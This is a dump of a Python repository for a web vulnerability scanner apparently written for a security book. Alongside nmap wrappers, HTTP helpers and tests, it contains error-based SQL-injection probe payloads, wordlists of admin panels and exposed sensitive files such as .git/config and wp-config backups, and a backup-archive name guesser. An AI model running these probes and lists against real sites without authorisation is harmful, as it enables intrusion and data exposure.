/teye_web/parser/documentParser.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/imiyoo2010/teye_scanner_for_book/HEAD/teye_web/parser/documentParser.pyc -------------------------------------------------------------------------------- /thirdparty/libnmap/objects/cpe.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/imiyoo2010/teye_scanner_for_book/HEAD/thirdparty/libnmap/objects/cpe.pyc -------------------------------------------------------------------------------- /thirdparty/libnmap/objects/host.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/imiyoo2010/teye_scanner_for_book/HEAD/thirdparty/libnmap/objects/host.pyc -------------------------------------------------------------------------------- /thirdparty/libnmap/objects/os.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/imiyoo2010/teye_scanner_for_book/HEAD/thirdparty/libnmap/objects/os.pyc -------------------------------------------------------------------------------- /thirdparty/libnmap/test/test_fp.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/imiyoo2010/teye_scanner_for_book/HEAD/thirdparty/libnmap/test/test_fp.pyc -------------------------------------------------------------------------------- /teye_report/template/dtree/.DS_Store: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/imiyoo2010/teye_scanner_for_book/HEAD/teye_report/template/dtree/.DS_Store -------------------------------------------------------------------------------- /teye_report/template/dtree/dtree.css: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/imiyoo2010/teye_scanner_for_book/HEAD/teye_report/template/dtree/dtree.css -------------------------------------------------------------------------------- /teye_report/template/dtree/img/cd.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/imiyoo2010/teye_scanner_for_book/HEAD/teye_report/template/dtree/img/cd.gif -------------------------------------------------------------------------------- /thirdparty/libnmap/objects/report.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/imiyoo2010/teye_scanner_for_book/HEAD/thirdparty/libnmap/objects/report.pyc -------------------------------------------------------------------------------- /thirdparty/libnmap/test/__init__.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/imiyoo2010/teye_scanner_for_book/HEAD/thirdparty/libnmap/test/__init__.pyc -------------------------------------------------------------------------------- /thirdparty/libnmap/test/test_cpe.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/imiyoo2010/teye_scanner_for_book/HEAD/thirdparty/libnmap/test/test_cpe.pyc -------------------------------------------------------------------------------- /thirdparty/libnmap/test/test_host.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/imiyoo2010/teye_scanner_for_book/HEAD/thirdparty/libnmap/test/test_host.pyc -------------------------------------------------------------------------------- /teye_report/template/dtree/img/base.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/imiyoo2010/teye_scanner_for_book/HEAD/teye_report/template/dtree/img/base.gif -------------------------------------------------------------------------------- /teye_report/template/dtree/img/empty.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/imiyoo2010/teye_scanner_for_book/HEAD/teye_report/template/dtree/img/empty.gif -------------------------------------------------------------------------------- /teye_report/template/dtree/img/globe.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/imiyoo2010/teye_scanner_for_book/HEAD/teye_report/template/dtree/img/globe.gif -------------------------------------------------------------------------------- /teye_report/template/dtree/img/join.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/imiyoo2010/teye_scanner_for_book/HEAD/teye_report/template/dtree/img/join.gif -------------------------------------------------------------------------------- /teye_report/template/dtree/img/line.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/imiyoo2010/teye_scanner_for_book/HEAD/teye_report/template/dtree/img/line.gif -------------------------------------------------------------------------------- /teye_report/template/dtree/img/minus.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/imiyoo2010/teye_scanner_for_book/HEAD/teye_report/template/dtree/img/minus.gif -------------------------------------------------------------------------------- /teye_report/template/dtree/img/page.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/imiyoo2010/teye_scanner_for_book/HEAD/teye_report/template/dtree/img/page.gif -------------------------------------------------------------------------------- /teye_report/template/dtree/img/plus.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/imiyoo2010/teye_scanner_for_book/HEAD/teye_report/template/dtree/img/plus.gif -------------------------------------------------------------------------------- /teye_report/template/dtree/img/trash.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/imiyoo2010/teye_scanner_for_book/HEAD/teye_report/template/dtree/img/trash.gif -------------------------------------------------------------------------------- /thirdparty/libnmap/objects/__init__.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/imiyoo2010/teye_scanner_for_book/HEAD/thirdparty/libnmap/objects/__init__.pyc -------------------------------------------------------------------------------- /thirdparty/libnmap/objects/service.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/imiyoo2010/teye_scanner_for_book/HEAD/thirdparty/libnmap/objects/service.pyc -------------------------------------------------------------------------------- /thirdparty/libnmap/plugins/__init__.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/imiyoo2010/teye_scanner_for_book/HEAD/thirdparty/libnmap/plugins/__init__.pyc -------------------------------------------------------------------------------- /thirdparty/libnmap/plugins/mongodb.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/imiyoo2010/teye_scanner_for_book/HEAD/thirdparty/libnmap/plugins/mongodb.pyc -------------------------------------------------------------------------------- /thirdparty/libnmap/test/test_parser.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/imiyoo2010/teye_scanner_for_book/HEAD/thirdparty/libnmap/test/test_parser.pyc -------------------------------------------------------------------------------- /thirdparty/libnmap/test/test_report.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/imiyoo2010/teye_scanner_for_book/HEAD/thirdparty/libnmap/test/test_report.pyc -------------------------------------------------------------------------------- /thirdparty/libnmap/test/test_service.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/imiyoo2010/teye_scanner_for_book/HEAD/thirdparty/libnmap/test/test_service.pyc -------------------------------------------------------------------------------- /teye_report/template/dtree/img/folder.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/imiyoo2010/teye_scanner_for_book/HEAD/teye_report/template/dtree/img/folder.gif -------------------------------------------------------------------------------- /teye_dir/admin.list: -------------------------------------------------------------------------------- 1 | #coding=utf-8 2 | /admin 3 | /manager 4 | /admin/admin_login.php 5 | /admin888 6 | /manager 7 | /guanli 8 | /houtai 9 | /gl 10 | -------------------------------------------------------------------------------- /teye_report/template/dtree/img/folderopen.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/imiyoo2010/teye_scanner_for_book/HEAD/teye_report/template/dtree/img/folderopen.gif -------------------------------------------------------------------------------- /teye_report/template/dtree/img/imgfolder.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/imiyoo2010/teye_scanner_for_book/HEAD/teye_report/template/dtree/img/imgfolder.gif -------------------------------------------------------------------------------- /teye_report/template/dtree/img/joinbottom.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/imiyoo2010/teye_scanner_for_book/HEAD/teye_report/template/dtree/img/joinbottom.gif -------------------------------------------------------------------------------- /teye_report/template/dtree/img/plusbottom.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/imiyoo2010/teye_scanner_for_book/HEAD/teye_report/template/dtree/img/plusbottom.gif -------------------------------------------------------------------------------- /teye_report/template/dtree/img/question.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/imiyoo2010/teye_scanner_for_book/HEAD/teye_report/template/dtree/img/question.gif -------------------------------------------------------------------------------- /thirdparty/libnmap/plugins/backendplugin.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/imiyoo2010/teye_scanner_for_book/HEAD/thirdparty/libnmap/plugins/backendplugin.pyc -------------------------------------------------------------------------------- /thirdparty/libnmap/test/test_new_parser.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/imiyoo2010/teye_scanner_for_book/HEAD/thirdparty/libnmap/test/test_new_parser.pyc -------------------------------------------------------------------------------- /thirdparty/libnmap/test/test_report_diff.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/imiyoo2010/teye_scanner_for_book/HEAD/thirdparty/libnmap/test/test_report_diff.pyc -------------------------------------------------------------------------------- /teye_report/template/dtree/img/minusbottom.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/imiyoo2010/teye_scanner_for_book/HEAD/teye_report/template/dtree/img/minusbottom.gif -------------------------------------------------------------------------------- /teye_report/template/dtree/img/musicfolder.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/imiyoo2010/teye_scanner_for_book/HEAD/teye_report/template/dtree/img/musicfolder.gif -------------------------------------------------------------------------------- /teye_report/template/dtree/img/nolines_plus.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/imiyoo2010/teye_scanner_for_book/HEAD/teye_report/template/dtree/img/nolines_plus.gif -------------------------------------------------------------------------------- /worker.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | #coding=utf-8 3 | import os 4 | from teye_worker.scan import app 5 | 6 | if __name__=="__main__": 7 | app.worker_main() 8 | -------------------------------------------------------------------------------- /teye_report/template/dtree/img/nolines_minus.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/imiyoo2010/teye_scanner_for_book/HEAD/teye_report/template/dtree/img/nolines_minus.gif -------------------------------------------------------------------------------- /thirdparty/libnmap/plugins/backendpluginFactory.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/imiyoo2010/teye_scanner_for_book/HEAD/thirdparty/libnmap/plugins/backendpluginFactory.pyc -------------------------------------------------------------------------------- /rpc_client.py: -------------------------------------------------------------------------------- 1 | #coding=utf-8 2 | ''' 3 | rpc_client.py 4 | ''' 5 | import rpyc 6 | c=rpyc.connect('192.168.126.167',9999) 7 | print c.root.test() 8 | c.close() 9 | 10 | -------------------------------------------------------------------------------- /thirdparty/libnmap/test/test_backend_plugin_factory.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/imiyoo2010/teye_scanner_for_book/HEAD/thirdparty/libnmap/test/test_backend_plugin_factory.pyc -------------------------------------------------------------------------------- /scan.config: -------------------------------------------------------------------------------- 1 | BROKER_URL = 'redis://localhost:6379/0' 2 | 3 | CELERY_TASK_SERIALIZER = 'json' 4 | CELERY_RESULT_SERIALIZER = 'json' 5 | CELERY_ACCEPT_CONTENT=['json'] 6 | CELERY_TIMEZONE = 'Europe/Oslo' 7 | CELERY_ENABLE_UTC = True 8 | -------------------------------------------------------------------------------- /tests/test_teye_poc.py: -------------------------------------------------------------------------------- 1 | #coding=utf-8 2 | 3 | def test_discuz_faq_sql(): 4 | ''' 5 | ''' 6 | vuln_url="http://www.baidu.com" 7 | 8 | vuln_item = (vuln_url,vuln_key) 9 | v = discuz_faq_sql() 10 | v.check(vuln_url) 11 | -------------------------------------------------------------------------------- /thirdparty/libnmap/objects/__init__.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | 3 | from libnmap.objects.report import NmapReport 4 | from libnmap.objects.host import NmapHost 5 | from libnmap.objects.service import NmapService 6 | 7 | __all__ = ['NmapReport', 'NmapHost', 'NmapService'] 8 | -------------------------------------------------------------------------------- /teye_data/config.py: -------------------------------------------------------------------------------- 1 | #coding=utf-8 2 | ''' 3 | config.py 4 | 5 | ''' 6 | 7 | class config(dict): 8 | 9 | def save(self, variableName, value): 10 | 11 | self[variableName] = value 12 | 13 | def getData(self, variableName): 14 | 15 | return self.get(variableName, None) 16 | 17 | cfg = config() 18 | -------------------------------------------------------------------------------- /LogManager.py: -------------------------------------------------------------------------------- 1 | #coding=utf-8 2 | ''' 3 | LogManager.py 4 | ''' 5 | import logging 6 | 7 | logging.basicConfig(format='%(name)s[%(levelname)s/%(process)d]:%(asctime)s:%(module)s.%(funcName)s.%(lineno)d - %(message)s') 8 | log = logging.getLogger("TScanner") 9 | log.setLevel(logging.INFO) 10 | #log.addHandler(logging.StreamHandler()) 11 | -------------------------------------------------------------------------------- /requirements.txt: -------------------------------------------------------------------------------- 1 | python-nmap==0.6.1 2 | redis==2.10.6 3 | pcap-parser==0.5.10 4 | gevent==1.2.1 5 | requests==2.14.2 6 | timeout_decorator==0.4.0 7 | SQLAlchemy==1.1.9 8 | paramiko==2.2.1 9 | beautifulsoup4==4.6.0 10 | celery==4.1.0 11 | dnspython==1.15.0 12 | lxml==4.0.0 13 | pypinyin==0.25.0 14 | rpyc==3.4.4 15 | simplejson==3.11.1 16 | hashes==1.1.0 17 | python-hashes==0.1dev-r0 18 | -------------------------------------------------------------------------------- /thirdparty/libnmap/test/process-stressbox/stresstest.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | from libnmap.process import NmapProcess 3 | from libnmap.parser import NmapParser, NmapParserException 4 | 5 | nm = NmapProcess('127.0.0.1', '-sP') 6 | rc = nm.run() 7 | if rc != 0: 8 | print("nmap scan failed: {0}".format(nm.stderr)) 9 | 10 | try: 11 | report = NmapParser.parse(nm.stdout) 12 | except NmapParserException as e: 13 | print("Exception raised while parsing scan: {0}".format(e.msg)) 14 | 15 | print(len(nm.stdout)) 16 | -------------------------------------------------------------------------------- /teye_web/http/querystring.py: -------------------------------------------------------------------------------- 1 | #coding=utf-8 2 | ''' 3 | querystring.py 4 | ''' 5 | import encode_decode as enc_dec 6 | from data import data 7 | 8 | from encodings import DEFAULT_ENCODING 9 | 10 | class querystring(data): 11 | ''' 12 | ''' 13 | def __init__(self, init_val=(), strict=False, encoding=DEFAULT_ENCODING): 14 | data.__init__(self, init_val, encoding) 15 | 16 | def __str__(self): 17 | ''' 18 | ''' 19 | return enc_dec.urlencode(self, encoding=self.encoding) 20 | 21 | 22 | 23 | if __name__=="__main__": 24 | ''' 25 | ''' 26 | a = querystring([("a",[2,3])]) 27 | print a 28 | 29 | -------------------------------------------------------------------------------- /tests/test_class_FingerScan.py: -------------------------------------------------------------------------------- 1 | #coding=utf-8 2 | 3 | import sys 4 | sys.path.append('/Users/imiyoo/workplace/tscanner') 5 | 6 | from teye_finger.FingerScan import FingerScan 7 | 8 | 9 | def test_scan_finger(): 10 | ''' 11 | ''' 12 | lnmp_body = "http://192.168.126.143/" 13 | 14 | nginx_headers = "http://192.168.1.143/" 15 | 16 | thinkphp_md5 = "http://192.168.126.143/thinkphp/" 17 | 18 | fs = FingerScan() 19 | fs.set_mode(1) 20 | res = fs.scan_finger(lnmp_body) 21 | print "%s 的应用指纹有:" % lnmp_body 22 | print res 23 | 24 | res1 = fs.scan_finger(thinkphp_md5) 25 | print "%s 的应用指纹有:" % thinkphp_md5 26 | print res1 27 | 28 | -------------------------------------------------------------------------------- /teye_util/banner.py: -------------------------------------------------------------------------------- 1 | #coding=utf-8 2 | ''' 3 | banner.py 4 | ''' 5 | 6 | version="1.0-dev for book" 7 | 8 | website="http://www.imiyoo.com/teye" 9 | 10 | banner=''' 11 | _____ ____ 12 | |_ _|__ _ _ ___ / ___| ___ __ _ _ __ _ __ ___ _ __ 13 | | |/ _ \ | | |/ _ \ \___ \ / __/ _` | '_ \| '_ \ / _ \ '__|\033[1;31m{%s}\033[0m 14 | | | __/ |_| | __/ ___) | (_| (_| | | | | | | | __/ | 15 | |_|\___|\__, |\___| |____/ \___\__,_|_| |_|_| |_|\___|_| \033[4;37m%s\033[0m 16 | |___/ 17 | '''% (version,website) 18 | 19 | 20 | def scan_banner(): 21 | print banner 22 | -------------------------------------------------------------------------------- /teye_web/util/error_sql.py: -------------------------------------------------------------------------------- 1 | #coding=utf-8 2 | ''' 3 | error_sql.py 4 | ''' 5 | from misc.common import md5,rand_numbers 6 | 7 | error_base_sql_db={ 8 | "floor":"(select{test 1}from (select count(*),concat(md5([CHECK_KEY]),floor(rand(0)*2))x from information_schema.tables group by x)a)", 9 | "extractvalue":"(extractvalue(1,concat(0x7e,(select md5(1)),0x7e)))", 10 | "updatexml":"(updatexml(1,concat(0x7e,(select md5(1)),0x7e),1))" 11 | } 12 | 13 | 14 | 15 | def get_error_sql_key(type="floor"): 16 | 17 | num = rand_numbers(2) 18 | 19 | sql = error_base_sql_db.get(type).replace("[CHECK_KEY]",num) 20 | 21 | key = md5(num)+"1" 22 | 23 | return sql,key 24 | -------------------------------------------------------------------------------- /tests/test_URL.py: -------------------------------------------------------------------------------- 1 | #coding=utf-8 2 | 3 | from teye_web.http.URL import URL 4 | 5 | 6 | def setUp(): 7 | pass 8 | 9 | def tearDown(): 10 | pass 11 | 12 | 13 | def TestURL(): 14 | url = URL("http://www.anquanbao.com/book/index.php?id=1#top") 15 | assert url.get_host()=="www.anquanbao.com" 16 | print url.get_port() 17 | assert url.get_port()==80 18 | assert url.get_path()=="/book/index.php" 19 | assert url.get_filename()=="index.php" 20 | assert url.get_ext() =="php" 21 | assert url.get_fragment()=="top" 22 | url = URL("http://www.anquanbao.com/book") 23 | print url.get_filename() 24 | 25 | url = URL("http://www.anquanbao.com/book/") 26 | print url.get_filename() 27 | -------------------------------------------------------------------------------- /tests/test_page_404.py: -------------------------------------------------------------------------------- 1 | #coding=utf-8 2 | 3 | from wCurl import wcurl 4 | from teye_util.page_404 import is_404 5 | 6 | def test_is_404(): 7 | ''' 8 | ''' 9 | url_200 = "http://www.anquanbao.com/" 10 | url_404 = "http://www.anquanbao.com/noexist.html" 11 | 12 | resp_200 =wcurl.get(url_200) 13 | resp_404 =wcurl.get(url_404) 14 | 15 | assert is_404(resp_200)==False 16 | assert is_404(resp_404)==True 17 | 18 | 19 | url_200 = "http://www.baidu.com/" 20 | url_404 = "http://www.baidu.com/noexist.html" 21 | 22 | resp_200 =wcurl.get(url_200) 23 | resp_404 =wcurl.get(url_404) 24 | 25 | assert is_404(resp_200)==False 26 | assert is_404(resp_404)==True 27 | -------------------------------------------------------------------------------- /teye_file/webdir/web.lst: -------------------------------------------------------------------------------- 1 | #coding=utf-8 2 | /admin 3 | /manager 4 | /admin888 5 | /guanli 6 | /manager/html 7 | /examples/ 8 | /log.txt 9 | /test.html 10 | /1.php 11 | /info.php 12 | /i.php 13 | /test.php 14 | /.svn/ 15 | /.svn/entries 16 | /install/ 17 | /.git/ 18 | /.git/config 19 | /.DS_Store 20 | /.idea/workspace.xml 21 | /.project 22 | /.htaccess 23 | /install.log 24 | /LICENSE.txt 25 | /license.txt 26 | /readme.rst 27 | /readme.txt 28 | /readme.html 29 | #wdcp探针 30 | /iProber2.php 31 | #Discuz X 3.2 32 | /utility/ 33 | /update.php 34 | /restore.php 35 | /uc_server/tools.php 36 | /config/config_global_default.php.bak 37 | /config/config_ucenter_default.php.bak 38 | #Wordpress 39 | /wp-config.php.bak 40 | /wp-config-sample.php.bak 41 | -------------------------------------------------------------------------------- /thirdparty/libnmap/test/process-stressbox/multi_nmap_process.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | from libnmap.process import NmapProcess 4 | 5 | def make_nmproc_obj(targets, options): 6 | return NmapProcess(targets=targets, options=options) 7 | 8 | def start_all(nmprocs): 9 | for nmp in nmprocs: 10 | print("Starting scan for host {0}".format(nmp.targets)) 11 | nmp.run() 12 | 13 | def summarize(nmprocs): 14 | for nmp in nmprocs: 15 | print("rc: {0} output: {1}".format(nmp.rc, len(nmp.stdout))) 16 | 17 | nm_targets = [] 18 | for h in range(20): nm_targets.append("localhost") 19 | nm_opts = "-sT" 20 | 21 | nm_procs = [make_nmproc_obj(t, nm_opts) for t in nm_targets] 22 | start_all(nm_procs) 23 | 24 | summarize(nm_procs) 25 | -------------------------------------------------------------------------------- /teye_web/util/rand_string.py: -------------------------------------------------------------------------------- 1 | #coding=utf-8 2 | ''' 3 | rand_string.py 4 | ''' 5 | from string import letters, digits 6 | from random import choice, randint 7 | 8 | def rand_letter(length=0): 9 | ''' 10 | ''' 11 | return ''.join(choice(letters) for x in xrange(length or randint(6, 10))) 12 | 13 | def rand_char(length=0): 14 | ''' 15 | ''' 16 | str_char = ''.join([letters, digits]) 17 | return ''.join(choice(str_char) for x in xrange(length or randint(6, 10))) 18 | 19 | def rand_number(length=0): 20 | ''' 21 | ''' 22 | return ''.join(choice(digits) for x in xrange(length or randint(6, 10))) 23 | 24 | 25 | if __name__=="__main__" : 26 | ''' 27 | ''' 28 | print rand_letter(10) 29 | print rand_char(10) 30 | print rand_number(10) 31 | -------------------------------------------------------------------------------- /thirdparty/libnmap/test/process-stressbox/proc_async.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | from libnmap.process import NmapProcess 4 | from time import sleep 5 | 6 | 7 | nmap_proc = NmapProcess(targets="scanme.nmap.org", options="-sT") 8 | nmap_proc.run_background() 9 | while nmap_proc.is_running(): 10 | nmaptask = nmap_proc.current_task 11 | if nmaptask: 12 | print("Task {0} ({1}): ETC: {2} DONE: {3}%".format(nmaptask.name, 13 | nmaptask.status, 14 | nmaptask.etc, 15 | nmaptask.progress)) 16 | sleep(0.5) 17 | 18 | print("rc: {0} output: {1}".format(nmap_proc.rc, nmap_proc.summary)) 19 | print(nmap_proc.stdout) 20 | -------------------------------------------------------------------------------- /teye_web/parser/documentParser.py: -------------------------------------------------------------------------------- 1 | #coding=utf-8 2 | ''' 3 | documentParser.py 4 | ''' 5 | import HtmlParser as HtmlParser 6 | import re 7 | import StringIO 8 | 9 | 10 | class documentParser: 11 | ''' 12 | This class is a document parser 13 | ''' 14 | def __init__(self,Response): 15 | ''' 16 | ''' 17 | try: 18 | parser = HtmlParser.HtmlParser(Response) 19 | except: 20 | msg = 'There is no parser for "%s".' % Response.get_url() 21 | raise msg 22 | 23 | self._parser = parser 24 | 25 | def get_get_urls(self): 26 | ''' 27 | ''' 28 | return self._parser.get_get_urls() 29 | 30 | def get_form_reqs(self): 31 | ''' 32 | ''' 33 | return self._parser.get_form_reqs() 34 | 35 | def get_forms(self): 36 | ''' 37 | ''' 38 | return self._parser.get_forms() -------------------------------------------------------------------------------- /teye_web/http/data.py: -------------------------------------------------------------------------------- 1 | #coding=utf-8 2 | ''' 3 | data.py 4 | ''' 5 | 6 | import urlparse 7 | import encode_decode as enc_dec 8 | 9 | from encodings import DEFAULT_ENCODING 10 | 11 | class data(dict): 12 | ''' 13 | ''' 14 | def __init__(self,init_val=(),encoding=DEFAULT_ENCODING): 15 | ''' 16 | ''' 17 | dict.__init__(self) 18 | 19 | self.encoding = encoding 20 | 21 | if isinstance(init_val, data): 22 | dict.update(self, init_val) 23 | elif isinstance(init_val,basestring): 24 | for k, v in urlparse.parse_qs(init_val).items(): 25 | self[k]=v[0] 26 | else: 27 | for item in init_val: 28 | try: 29 | key, val = item 30 | except TypeError: 31 | raise TypeError('key ,val= item') 32 | self[key] = val 33 | 34 | 35 | if __name__=="__main__": 36 | a = data("user=1&password=2") 37 | print a 38 | -------------------------------------------------------------------------------- /misc/factory.py: -------------------------------------------------------------------------------- 1 | #coding=utf-8 2 | ''' 3 | factory.py 4 | ''' 5 | import sys 6 | import traceback 7 | 8 | def factory(moduleName, **args): 9 | ''' 10 | 动态加载模块 11 | ''' 12 | try: 13 | __import__(moduleName) 14 | except Exception, e: 15 | raise Exception('Error Import Plugin: '+ moduleName +', Exception: ' + str(e)) 16 | else: 17 | className = moduleName.split('.')[-1] 18 | 19 | try: 20 | aModule = sys.modules[moduleName] 21 | aClass = getattr(aModule , className) 22 | except: 23 | raise Exception('Error Load Plugin: '+ moduleName + '.') 24 | else: 25 | try: 26 | inst = aClass(*args) 27 | except Exception, e: 28 | msg = 'Error Instance: ' + className + ', Exception: ' + str(e) + ', Traceback: ' + str( traceback.format_exc() ) 29 | raise Exception(msg) 30 | return inst 31 | 32 | -------------------------------------------------------------------------------- /thirdparty/libnmap/test/process-stressbox/stop_scan.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | from libnmap.process import NmapProcess 4 | from time import sleep 5 | 6 | 7 | nmap_proc = NmapProcess(targets="scanme.nmap.org", options="-sV") 8 | nmap_proc.run_background() 9 | while nmap_proc.is_running(): 10 | nmaptask = nmap_proc.current_task 11 | if nmaptask: 12 | print("Task {0} ({1}): ETC: {2} DONE: {3}%".format(nmaptask.name, 13 | nmaptask.status, 14 | nmaptask.etc, 15 | nmaptask.progress)) 16 | sleep(3) 17 | nmap_proc.stop() 18 | 19 | print("rc: {0} output: {1}".format(nmap_proc.rc, nmap_proc.summary)) 20 | print(nmap_proc.stdout) 21 | print(nmap_proc.stderr) 22 | -------------------------------------------------------------------------------- /teye_web/parser/dpCache.py: -------------------------------------------------------------------------------- 1 | #coding=utf-8 2 | ''' 3 | dpCache.py 4 | ''' 5 | from __future__ import with_statement 6 | 7 | import documentParser as documentParser 8 | from lru import LRU 9 | import threading 10 | 11 | 12 | class dpCache: 13 | ''' 14 | This class is a document parser cache. 15 | ''' 16 | def __init__(self): 17 | self._cache = LRU(30) 18 | self._LRULock = threading.RLock() 19 | 20 | def getDocumentParserFor(self, Response): 21 | ''' 22 | ''' 23 | res = None 24 | hash_string = hash(Response.body) 25 | 26 | with self._LRULock: 27 | if hash_string in self._cache: 28 | res = self._cache[ hash_string ] 29 | else: 30 | # Create a new instance of dp, add it to the cache 31 | res = documentParser.documentParser(Response) 32 | self._cache[ hash_string ] = res 33 | 34 | return res 35 | 36 | dpc = dpCache() 37 | -------------------------------------------------------------------------------- /teye_web/util/gen_zip_name.py: -------------------------------------------------------------------------------- 1 | #coding=utf-8 2 | 3 | def gen_zip_name(domain): 4 | ''' 5 | ''' 6 | common_list = ["demo","wwwtest","test","www","wwwbak","wwwroot","w","wbak","web","webroot","root","default","home","homeroot","1","111","123"] 7 | 8 | black_list = ["com","cn","org"] 9 | 10 | d_list = domain.split(".") 11 | #过滤掉IP地址 12 | #域名:www.watscan.com 13 | common_list.append(domain) 14 | #域名:watscan.com,watscan_com 15 | new_domain_1 = ".".join(d_list[1:]) 16 | new_domain_2 = "_".join(d_list[1:]) 17 | common_list.append(new_domain_1) 18 | common_list.append(new_domain_2) 19 | #域名:www_watscan_com 20 | new_domain_3 = "_".join(d_list) 21 | common_list.append(new_domain_3) 22 | 23 | 24 | for item in d_list: 25 | if item=="www": 26 | continue 27 | if item in black_list: 28 | continue 29 | common_list.append(item) 30 | 31 | return common_list 32 | 33 | -------------------------------------------------------------------------------- /thirdparty/libnmap/test/process-stressbox/stressback.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | from libnmap.process import NmapProcess 4 | from time import sleep 5 | 6 | def make_nmproc_obj(targets, options): 7 | return NmapProcess(targets=targets, options=options) 8 | 9 | def start_all_bg(nmprocs): 10 | for nmp in nmprocs: nmp.run_background() 11 | 12 | def any_running(nmprocs): 13 | return any([nmp.is_running() for nmp in nmprocs]) 14 | 15 | def summarize(nmprocs): 16 | for nmp in nmprocs: 17 | print("rc: {0} output: {1}".format(nmp.rc, len(nmp.stdout))) 18 | print(nmp.stdout) 19 | 20 | nb_targets = 10 21 | nm_target = "localhost" 22 | nm_opts = "-sP" 23 | 24 | nm_targets = [nm_target for i in range(nb_targets)] 25 | nm_procs = [make_nmproc_obj(t, nm_opts) for t in nm_targets] 26 | start_all_bg(nm_procs) 27 | 28 | while any_running(nm_procs): 29 | sleep(5) 30 | 31 | summarize(nm_procs) 32 | -------------------------------------------------------------------------------- /tests/test_dns.py: -------------------------------------------------------------------------------- 1 | #coding=utf-8 2 | #test_dns.py 3 | 4 | import socket 5 | 6 | _dnscache = {} 7 | 8 | def _setDNSCache(): 9 | def _getaddrinfo(*args,**kwargs): 10 | global _dnscache 11 | if args in _dnscache: 12 | return _dnscache[args] 13 | else: 14 | _dnscache[args] = socket._getaddrinfo(*args,**kwargs) 15 | return _dnscache[args] 16 | 17 | if not hasattr(socket,'_getaddrinfo'): 18 | socket._getaddrinfo = socket.getaddrinfo 19 | socket.getaddrinfo = _getaddrinfo 20 | def test(): 21 | _setDNSCache() 22 | import requests 23 | r1 = requests.get('http://www.baidu.com') 24 | print "第一次没命中缓存的时间:"+str(r1.elapsed.microseconds) 25 | r2 = requests.get('http://www.baidu.com') 26 | print "第二次命中缓存的时间:"+str(r2.elapsed.microseconds) 27 | test() 28 | -------------------------------------------------------------------------------- /thirdparty/libnmap/test/process-stressbox/multi_nmap_process_background.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | from libnmap.process import NmapProcess 4 | from time import sleep 5 | 6 | def make_nmproc_obj(targets, options): 7 | return NmapProcess(targets=targets, options=options) 8 | 9 | def start_all_bg(nmprocs): 10 | for nmp in nmprocs: nmp.run_background() 11 | 12 | def any_running(nmprocs): 13 | return any([nmp.is_running() for nmp in nmprocs]) 14 | 15 | def summarize(nmprocs): 16 | for nmp in nmprocs: 17 | print("rc: {0} output: {1} stdout len: {2}".format(nmp.rc, nmp.summary, len(nmp.stdout))) 18 | 19 | nm_targets = [] 20 | for h in range(10): 21 | nm_targets.append("localhost") 22 | nm_opts = "-sT" 23 | 24 | nm_procs = [make_nmproc_obj(t, nm_opts) for t in nm_targets] 25 | start_all_bg(nm_procs) 26 | 27 | while any_running(nm_procs): 28 | print("Nmap Scan running...") 29 | sleep(2) 30 | 31 | summarize(nm_procs) 32 | -------------------------------------------------------------------------------- /tests/test_retry_action.py: -------------------------------------------------------------------------------- 1 | #coding=utf-8 2 | import sys 3 | sys.path.append('/Users/imiyoo/workplace/tscanner') 4 | 5 | import time 6 | import requests 7 | from wCurl import wcurl 8 | from LogManager import log 9 | 10 | def retry_action(retry_num=3): 11 | def decorator(function): 12 | count = {"num":0} 13 | def wrapper(*args,**kwargs): 14 | try: 15 | return function(*args,**kwargs) 16 | except Exception,e: 17 | if count["num"]1: 21 | result.append(temp_list[0]) 22 | del temp_list[0] 23 | 24 | for item in temp_list: 25 | flag = False 26 | for a in result: 